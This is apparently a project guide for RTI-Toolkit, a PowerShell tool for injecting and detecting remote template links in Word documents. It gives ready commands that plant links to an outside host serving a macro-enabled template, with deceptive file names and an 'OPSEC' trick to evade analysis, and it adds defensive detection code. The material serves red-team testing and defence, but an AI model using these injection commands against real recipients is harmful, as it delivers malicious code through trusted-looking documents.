RTI-Toolkit - PowerShell for RTI Attacks and Defense

RTI-Toolkit is an open-source PowerShell toolkit designed to facilitate Remote Template Injection (RTI) attacks and defenses.

It includes a PowerShell script, PS-Templator.ps1, which provides tools for both offensive and defensive cybersecurity operations. This guide explains the toolkit's features, usage, and examples.

Overview

Remote Template Injection (RTI) is a security vulnerability in Microsoft Office documents (e.g., Word) that exploits external template links embedded in DOCX files.

These documents store their content in XML format, which can be manipulated to include malicious links or resources. RTI attacks are often macro-based and can deceive users or exploit vulnerabilities.

The RTI-Toolkit helps security professionals implement and detect RTI vulnerabilities in Word documents.

Key Features

  • Attacking Perspective:

    • Inject remote template links into default Word templates or regular Word documents.

  • Defensive Perspective:

    • Identify remote template links in potentially malicious Word documents.

Supported File Types

The toolkit supports only DOCX files.

Version and License

  • Current Version: 1.0.0

  • License: MIT

Installation

To use the toolkit, load the PS-Templator.ps1 script as a PowerShell module:

Import-Module .\PS-Templator.ps1

Requirements

  • Tested on Windows 10 with Office 2019 Professional Plus.

  • No additional dependencies are required.

Cmdlets Overview

The toolkit includes three main cmdlets, each serving a specific purpose:

| Cmdlet | Description | Perspective |
|---|---|---|
| Invoke-Template | Implements remote template links within default Office Word templates. | Attacking |
| Invoke-Regular | Implements remote template links within regular Office Word documents. | Attacking |
| Invoke-Identify | Identifies remote template links within Word DOCX documents. | Defensive |

Cmdlet Usage and Examples

1. Invoke-Template

This cmdlet injects a malicious remote template link into a default Word template.

Example:

Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Outcome:

  • The original document is backed up.

  • The malicious document is saved at the specified output path.

To debug, open the malicious DOCX file as a ZIP archive (a DOCX is a ZIP container, so renaming it to .zip is enough) and inspect /word/_rels/settings.xml.rels for the injected link.

2. Invoke-Regular

This cmdlet inserts a remote template link into a regular Word document without templates.

Example 1:

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Outcome:

  • A backup of the original document is created.

  • The malicious document is saved with the specified name.

Example 2 (OPSEC Enhancement):

Use the -TemplateName parameter to make the document appear more legitimate during analysis:

Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

To debug, open the DOCX file as a ZIP archive (renaming it to .zip is enough) and inspect /docProps/app.xml for the fake template name.

3. Invoke-Identify

This cmdlet identifies remote template links in Word documents, whether malicious or clean.

Example 1 (Malicious Document):

Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Outcome:
The output file contains details about any detected remote template links.

Example 2 (Non-Malicious Document):

Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Outcome:
The output file confirms that no malicious links were found.
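The check behind the defensive perspective, and the manual look at /word/_rels/settings.xml.rels described earlier, can be done without unpacking the file by hand. The following is an added example, not the toolkit's Invoke-Identify code; the function name Find-RemoteTemplateLink, the temp file name and the example.invalid URL are constructed for illustration.

```powershell
Add-Type -AssemblyName System.IO.Compression, System.IO.Compression.FileSystem

function Find-RemoteTemplateLink {
    # Hypothetical helper (not a toolkit cmdlet): lists attachedTemplate relationships in a DOCX.
    param([Parameter(Mandatory)][string]$Path)

    # The document is untrusted input, so parse its XML with DTDs and external resolution off.
    $settings = New-Object System.Xml.XmlReaderSettings
    $settings.DtdProcessing = [System.Xml.DtdProcessing]::Prohibit
    $settings.XmlResolver = $null

    $zip = [System.IO.Compression.ZipFile]::OpenRead((Resolve-Path -LiteralPath $Path).ProviderPath)
    try {
        foreach ($entry in $zip.Entries) {
            if ($entry.FullName -notlike '*_rels/*.rels') { continue }
            $stream = $entry.Open()
            try {
                $doc = New-Object System.Xml.XmlDocument
                $doc.Load([System.Xml.XmlReader]::Create($stream, $settings))
            } finally { $stream.Dispose() }
            foreach ($rel in $doc.DocumentElement.ChildNodes) {
                if ($rel.LocalName -ne 'Relationship') { continue }
                if ($rel.GetAttribute('Type') -notlike '*/attachedTemplate') { continue }
                $target = $rel.GetAttribute('Target')
                [pscustomobject]@{
                    Part   = $entry.FullName
                    Target = $target
                    # URLs and UNC or file://server paths load over the network; file:///C:/... is local.
                    Remote = ($target -match '^(https?|ftp)://') -or ($target -match '^(file:)?[\\/]{2}[^\\/]')
                }
            }
        }
    } finally { $zip.Dispose() }
}

# Constructed sample: a ZIP holding only the relationship part (not a complete Word document).
$sample = Join-Path ([System.IO.Path]::GetTempPath()) 'rti-sample.docx'
Remove-Item $sample -ErrorAction SilentlyContinue
$relsXml = @'
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://templates.example.invalid/Doc1.docm" TargetMode="External"/>
</Relationships>
'@
$out = [System.IO.Compression.ZipFile]::Open($sample, 'Create')
$w = New-Object System.IO.StreamWriter($out.CreateEntry('word/_rels/settings.xml.rels').Open())
$w.Write($relsXml); $w.Dispose(); $out.Dispose()
Find-RemoteTemplateLink -Path $sample | Format-List
```

Documents created from a local template also carry an attachedTemplate relationship, so the Remote flag is what separates a network-loaded template from an ordinary local one during triage.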

Acknowledgements

Special thanks to:

  • @Papadope9 and Stavros Gkounis (a.k.a purpl3ph03n1x) for their assistance during beta testing.

  • @S1ckB0y1337 for inspiring this tool during an iCAST Red Teaming Assessment.

Created with ❤️ by @nickvourd.

You can learn more and download RTI-Toolkit on GitHub.
